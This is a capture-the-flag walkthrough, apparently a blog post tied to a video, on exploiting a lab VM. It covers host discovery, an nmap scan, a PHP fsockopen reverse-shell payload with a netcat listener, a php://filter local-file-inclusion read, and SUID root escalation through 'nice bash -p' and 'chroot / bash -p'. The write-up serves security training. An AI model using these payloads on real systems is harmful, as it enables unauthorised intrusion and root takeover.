In this video, we will be diving deep into the world of command injection penetration testing. Command injection is a type of vulnerability that allows an attacker to execute arbitrary commands on a system. By uncovering such vulnerabilities through thorough testing, we can prevent potential security breaches and protect our systems from malicious attacks.

During this tutorial, you will learn about the importance of conducting command injection penetration testing, the common techniques and tools used in the process, and how to effectively identify and remediate vulnerabilities in your system.

Whether you are a beginner looking to expand your knowledge in cybersecurity or a seasoned professional wanting to sharpen your skills, this video will provide you with valuable insights and practical tips to enhance your security testing practices.

Don’t wait until it’s too late! Join us on this journey to uncover vulnerabilities and strengthen your defense against cyber threats.

Be sure to like, share, and subscribe for more informative content on cybersecurity and penetration testing.

Identify the target

As usual, I identified the IP address of the target machine.

sudo netdiscover -i eth0 -r 10.0.2.0/24

My IP address is 10.0.2.15 and that of the target is 10.0.2.61.

Scan open ports

Next, I scanned the open ports on the target machine. Doing so will give us an idea of the exposed services on the target machine.

nmap -v -T4 -sC -sV -p- -oN nmap.log 10.0.2.61

Enumerate web server

I checked the webserver at first.

The default page contained two links. Here, the TEST redirects to port 8080. Likewise, the Production link gave me the following page.

Looking at the inputs, it is asking the command and a code. So, I used the arbitrary code (9001) and a valid Linux command ‘id’.

However, it didn’t give me any command execution. But we see some results here. For example, we have now a new GET parameter “out”. Similarly, we see the date and time, and the IP address of my machine. So, we can guess that some variables have been used. Therefore, I tried executing some PHP code.

From the screenshot above, it confirmed that we can execute PHP commands. So, I used the following payload inside the PHP syntax. to get the reverse shell. Before this, I listened on port 9001 for the reverse shell.

nc -nlvp 9001

$sock=fsockopen(“10.0.2.15“,9001);exec(“bash <&3 >&3 2>&3″);

Finally, I got the shell. Next, I improved the shell using the following link.

Upgrade to an intelligent reverse shell

Bonus: Local File Inclusion

As I told you earlier, there is a new GET parameter “out”. Interestingly, the parameter allowed local file inclusion.

So, we can check the techniques from the following reference.

Only the technique to read the source code worked. This is because the user www-data didn’t have access to do log poisoning. Similarly, some plugins aren’t enabled.

php://filter/convert.base64-encode/resource=sendcommand.php

After decoding the code, we see that the command isn’t validated and we could execute remote commands as we did earlier.

Privilege Escalation

Finally, it came to the part to escalate privileges. There were two users ppp and fox. However, I couldn’t find any way to escalate to any of the users. Interestingly, when I looked at the SUID binaries, there were two binaries that could give me root access.

find / -perm -4000 -exec ls -al {} \; 2>/dev/null

Using nice: https://gtfobins.github.io/gtfobins/nice/#suid

nice bash -p

Using chroot: https://gtfobins.github.io/gtfobins/chroot/#suid

chroot / bash -p

I guess this explains the name of the machine. Lastly, I got both flags.